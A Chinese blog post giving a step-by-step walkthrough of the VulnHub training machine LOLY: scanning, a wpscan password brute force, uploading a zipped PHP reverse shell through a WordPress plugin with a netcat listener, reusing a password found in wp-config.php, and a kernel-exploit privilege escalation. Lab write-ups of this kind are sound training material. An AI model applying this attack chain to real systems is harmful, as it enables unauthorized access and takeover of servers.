靶场练习(4):LOLY

已于 2024-09-12 20:41:32 修改
阅读量604 收藏 9
点赞数 14
分类专栏: vulnhub靶场练习 文章标签: 网络安全 web安全
于 2024-09-11 20:47:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dcy1124/article/details/142147956
版权

靶机ip:172.16.33.25

突破

端口扫描

sudo nmap -p- 172.16.33.25 --open

结果如下:

在这里插入图片描述

特定端口扫描

sudo nmap -p80 -sV -A 172.16.33.25

结果如下:

在这里插入图片描述

对其进行路径扫描:

dirsearch -u http://172.16.33.25

在这里插入图片描述

对其进行文件扫描:

dirsearch -u http://172.16.33.25 -f -e txt,php,html.pdf

结果如下:

在这里插入图片描述

针对80端口

直接访问ip地址,无发现,访问http:/172.16.33.25/wordpress/发现简陋页面,打开源码发现/loly.lc:

在这里插入图片描述

在这里插入图片描述
考虑绑定hosts文件

sudo vi /etc/hosts

添加下列语句进去

172.16.33.25 loly.lc

再次访问http://172.16.33.25/wordpress,发现完整页面,但是手动检查后发现没有可用漏洞。

在这里插入图片描述

既然有wordpress则想到wpscan漏扫工具,使用后发现loly这个用户名:

wpscan --url http://172.16.33.25/wordpress/ -e --api-token <自己的wpscan api>

在这里插入图片描述

对loly这个用户名进行密码爆破,得到密码:fernando

wpscan --url http://172.16.33.25/wordpress -U loly -P /usr/share/wordlists/nmap.lst

在这里插入图片描述

登录进入worpress管理界面

在这里插入图片描述

一番搜索之后,在AdRotate->Manage Media里发现了一个上传功能

在这里插入图片描述

仔细阅读小字,大致意思是:

接受的文件:jpg, jpeg, gif, png, svg, html, js和zip。每个文件的最大大小为512Kb。
重要:请确保文件名称中没有空格或特殊字符。用-或_替换空格。 Zip文件将在上传位置自动解压缩,解压缩后将删除原始Zip文件。
您可以在下面创建顶级文件夹。文件夹名称长度可以在1到100个字符之间。任何特殊字符都被去掉。

由此可以想到,将反弹php脚本先压缩,再进行上传操作,之后直接执行脚本文件本身。

在AdRotate->Settings里看到讲解,所有存储的文件均在/wordpress/wp-content/banners中。

在这里插入图片描述

则做好监听,直接访问http://172.16.33.25/wordpress/wp-content/banners/<脚本文件名>.php

nc -nvlp 1234

在这里插入图片描述

查看kali端,发现反弹成功,突破阶段完成。

在这里插入图片描述

提权

升级终端

python3 -c 'import pty;pty.spawn("/bin/bash")'

通过内核漏洞45010.c进行提权

查看内核信息以及版本信息:

在这里插入图片描述

用searchsploit搜索内核漏洞:

在这里插入图片描述

看到45010.c,下载后通过wget和python将该文件传输至kali端的/tmp目录下,尝试编译:

gcc -o bbb 45010.c

报错,这个错误可能是因为权限不够的原因。

在这里插入图片描述

在/var/www/html/wordpress里找到wp-config.php,查看其内容发现mysql数据库的账号和密码:

在这里插入图片描述

用这个密码尝试登录loly账户,成功

su loly
lolyisabeautifulgirl

再次尝试编译文件并运行45010.c,成功
在这里插入图片描述

提权成功,打靶完成。

bebabong
关注
专栏目录
OSCP-1-5-loly(wordpress、爆破密码上传webshell、配置文件、ubuntu4.4)
墨痕诉清风的博客
08-02 164
登录,上传zip格式文件webshell。添加 /etc/hosts。这里利用搜索也可以找到密码。nmap只获取到80端口。配置文件泄露loly密码。执行路径反弹shell。
小米4A 32电视通过TTL方式ROOT的方法
mthth的博客
09-20 6473
小米4A 32电视目前无法通过recovery的方式刷机root,参考了多个网上资料,特别是4PDA.RU论坛上的@loly的思路后,发现可以通过HDMI接口进行TTL通讯的这条路可行
【打靶练习】vulnhub: loly
守拙的博客
07-23 353
loly靶机操作练习,主要为wordpress渗透
【vlunhub:loly靶机】
Lemonade2023的博客
09-11 434
5.在AdRotate-Mange Media插件可上传zip文件,并且会自动解密。指定WordPress安装在目标服务器的/wordpress子目录下。不是很懂为什么确定要使用45010.c这个漏洞利用脚本。将反弹shell代码修改为shell.php。uname -a查看内核,通过内核漏洞提权。浏览器访问上传的反弹shell.php。loly的密码是fernando。压缩为shell.php.zip。在本地开放简易python服务器。gcc编译后运行生成的exp文件。wpscan枚举用户名。
vulnhub Loly: 1
箭雨镜屋
09-12 2099
渗透思路: nmap扫描端口 ---- gobuster扫描网站目录 ---- wpscan爆破wordpress用户名和密码 ---- 利用wordpress AdRotate文件上传功能getshell ---- 利用内核漏洞提权(eBPF_verifier)
LOLY: 1靶机
logan_logan的博客
07-19 697
1.端口扫描 2.在网页输入IP地址的时候发现一直跳转成loly.lc,所以在/etc/hosts添加一条解析; 3.目录枚举 通过目录枚举发现CMS是wordpress,直接上wpscan; gobuster dir -u http://10.36.101.181/wordpress -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 4.WPSCAN枚举 经过枚举,成功得到用户名和密码; wpscan --url htt
Vulnhub靶场渗透实战—Loly
weixin_71914594的博客
10-25 266
靶场地址:https://www.vulnhub.com/entry/loly-1,538/靶场下载:https://download.vulnhub.com/loly/Loly.ova(下载后直接用Vmware打开)将靶机与攻击机放入同一网段攻击机:192.168.237.137靶机:192.167.237.163。
fun html5 qq,Loly fun HTML5 games
weixin_39895995的博客
06-20 218
Welcome to m.lolygames.com where you can play all sorts of free online games, including Puzzle games, Girl games, Dress-up games, Barbie games, Time Management games, Racing games, Arcade games and Hi...
JavaScript:创建对象(原型模式和构造函数模式)
m0_47147246的博客
07-15 177
JavaScript:创建对象(原型模式和构造函数模式)
loly - lossless to loosely-开源
05-09
接下来,loly 将这些拆分后的wav文件编码为m4a格式,这是一种高效的有损音频编码格式,但相对于其他有损格式,如MP3,m4a在保持较高音质的同时,文件大小更小。更重要的是,loly 还支持自动添加元标记,这意味着转换...
简单的超市管理系统(Java实现)
02-07
4. **客户管理模块**:存储和管理客户信息,可能包括姓名、联系方式等。可以使用JDBC进行客户数据的CRUD操作。 5. **SQL初始化文件**:这些文件通常包含了创建数据库表结构、初始数据插入以及可能的视图和存储过程...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8499
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
10-10 1268
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
网络安全:数字时代的坚实护盾》
一名资深Java工程师的技术分享
10-10 416
在当今高度数字化的时代,网络安全的重要性如同空气对于生命一般不可或缺。它不仅关乎个人的隐私与财产安全,更对企业的生存发展和国家的稳定繁荣起着至关重要的作用。
网络安全(黑客)自学
白帽子凯哥聊黑客
10-10 897
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
什么是网络安全
m0_66268916的博客
10-07 542
全站防护是基于风险管理和WAAP理念打造的安全方案,以“体系化主动安全” 取代安全产品的简单叠加,为各类Web、API业务等防御来自网络层和应用层的攻击,帮助企业全面提升Web安全水位和安全运营效率。网络安全是指通过采取必要措施,防范对网络的攻击、侵入、干扰、破坏和非法使用以及意外事故,使网络处于稳定可靠运行的状态,以及保障网络数据的完整性、保密性、可用性的能力。网络安全涉及多个层面,包括硬件、软件及其系统中数据的保护和确保网络系统的连续可靠运行,防止数据被破坏、更改、泄露。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-09 940
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全(黑客技术)2024年三个月自学手册
最新发布
2401_85026116的博客
10-11 2720
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值